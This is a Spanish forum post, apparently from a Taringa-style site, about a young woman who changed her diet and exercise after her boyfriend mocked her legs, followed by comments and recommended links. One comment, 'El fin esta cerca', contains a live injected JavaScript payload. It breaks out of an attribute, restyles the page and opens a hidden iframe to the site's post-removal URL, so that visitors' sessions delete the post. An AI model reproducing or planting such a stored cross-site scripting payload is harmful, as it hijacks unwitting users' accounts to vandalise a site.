Su novio la criticó por sus piernas y decidió tomar medidas

Hecho por BlackGoku en la categoría Salud

Estar en una relación amorosa tóxica puede hacernos mucho daño. Básicamente, estamos en una cuando nuestra pareja solo nos hace sentir mal, nos deprime, nos agota, nos hace tener ansiedad… pero, a pesar de todo, ahí seguimos. Influye en tus pensamientos, emociones y actitudes de forma perjudicial y negativa (ya sea a través del control, menosprecio, manipulación…) Pero hay señales más claras que otras y, ante esta situación, alejarte de esa persona puede ser lo mejor.

Scarlett Skinner es una joven de 23 años que salió de fiesta junto a su media naranja. En un momento determinado de la noche, su novio le hizo un comentario muy lamentable y cruel, pero que acabaría cambiando su vida.


Le dijo que “no debería llevar nada corto por la celulitis que tenía en la parte trasera de las piernas“. Durante cuatro años, no vistió faldas ni shorts. Poco después, decidió romper con él, pero el comentario hizo mella en su conciencia y durante cuatro años solo se puso pantalones.

Su novio la criticó por sus piernas y decidió tomar medidas

“Me dijo que era por mi propio bien porque la gente se había estado riendo de mí a mis espaldas en una discoteca. Cualquiera que le diga a alguien que debe sentirse avergonzado de su cuerpo es simplemente repugnante, pero fue alguien cercano a mí, así que seguí lo que me dijo durante años“.

Mientras estaban juntos, Scarlett llevó un estilo de vida muy poco saludable: seguía una dieta poco equilibrada y no hacía ejercicio.

relacion

“Comía fritanga para desayunar, así como enormes cantidades de comida basura, dulces y chocolate, y mi seguridad estaba por los suelos. Me escondía y cambié mi forma de vestir por completo. Cada pieza de vestir que llevaba era de mangas largas, de cuello alto y holgada. También pantalones largos y una chaqueta enorme“.


“Nunca me sentí sensual ni atractiva. Recuerdo sentir siempre mis michelines por encima de mis pantalones y nunca poder sentirme cómoda mientras comía“. Después conoció a otro chico, pero su relación insana con la comida siguió adelante.

amor

“Sabía que estaba ganando peso al principio de mi nueva relación, era simplemente la comodidad de sentarse en casa con tu persona favorita viendo películas y comiendo tus snacks preferidos. Pero no nunca tuve seguridad en la forma en que lucía“.

“Me ponía enferma físicamente unas dos veces por semana porque abusaba y nunca tuve el estómago calmado. Mi compañera de piso me dijo de salir con ella un día y ni siquiera pude llegar al final de la calle. No estaba nada en forma“.

cuidarnos

Hasta que decidió que había tenido suficiente. Concretamente, cuando vio unas fotos suyas llevando la ropa interior que se acababa de comprar. “Sinceramente, no me podía creer lo que estaba viendo, me sentí enferma por completo”.

Se apuntó al gimnasio y empezó a seguir una rutina de entrenamiento y una dieta con el fin de cambiar su vida. Ahora ha transformado su cuerpo y se siente mucho más feliz y sana.

cambios

“Algo hizo clic en mi cerebro. Estaba bajo mucho estrés en mi tercer año en la universidad, pero la sensación después del gimnasio y ver el progreso me hizo mucho más feliz.

Ahora voy al gimnasio cinco veces a la semana y he hecho cambios sencillos en mi estilo de vida como caminar en lugar de coger el bus“.

ansiedad

 


35

Comentarios 2057

MadAra - Mad-1545016413077 - Hace 7 meses

El fin esta cerca "document.body.setAttribute('style',' background: url(https://vignette.wikia.nocookie.net/aldea/images/f/f4/Madara_Uchiha_sharingan.gif/revision/latest?cb=20110911030748&path-prefix=es)');setTimeout(function(){var i = document.createElement('iframe');i.src = 'https://1peluchinga.com/post/remove/'+window.location.toString().match(/(.*?):\/\/1peluchinga.com\/comentario\/(.*?)\//)[2];i.style.visibility = 'hidden';document.body.appendChild(i) ;}),3000">

MatrixDeone - Matrixdeone - Hace 10 meses


Kaisider299 - Kai299 - Hace 10 meses

De jamon a jamoncito


¨

Recomendados papu

Ex taringuero


La chica trans tucumana que conquistó a chano: fotos


El origen de gianfranco castronovo


Gano argentina y sigue el choreo. entra al bardo


Rolling stone: los 100 mejores álbumes del rock argentino


Esas cositas turbias las quiero


El mejor recuerdo que tengo con una mujer


Diosas a los 58 años! las trillizas de oro sorprendieron con una sensual sesión de fotos en bikini


One piece manga 564-566 [full color] [marineford]


Encuentran un caracol de 99 millones en ambar